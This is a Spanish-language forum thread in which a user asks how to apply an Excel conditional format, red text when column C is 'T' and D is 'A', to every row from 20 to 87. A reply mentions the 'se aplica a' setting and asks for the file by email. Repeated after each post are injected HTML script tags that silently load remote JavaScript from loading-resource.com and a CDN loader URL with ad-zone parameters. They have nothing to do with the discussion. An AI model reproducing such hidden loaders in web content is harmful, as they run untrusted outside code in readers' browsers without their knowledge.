Expandir formato condicional a todas las filas

Buenos días:

Es posible expandir la opción de formato condicional a todas las filas:

Gracias a Luis Mondelo en este momento tengo un formato condicional que pone en rojo A20:H20 cuando la C20 es "T" y D20 es "A". Mi pregunta es como puedo hacer que esta opción me valga para C21, C22, C23 y asi sucesivamente. Mi rango donde se encuentran valores es C20:H87.

Tengo que darle a cada fila un formato condicional o se puede hacer de una manera mas facil?

Un slds.

1 respuesta

Respuesta

Dentro del formato condicional tienes la característica "se aplica a: " para modificar donde afectará el formato. De todas formas mándame un ejemplo de lo que quieres explicado en el excel.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Hola Luis:

Prefieres que te describa los datos o te envío por correo el archivo excel?

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Mejor me lo mandas con un ejemplo explicado en el excel.

[email protected]

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>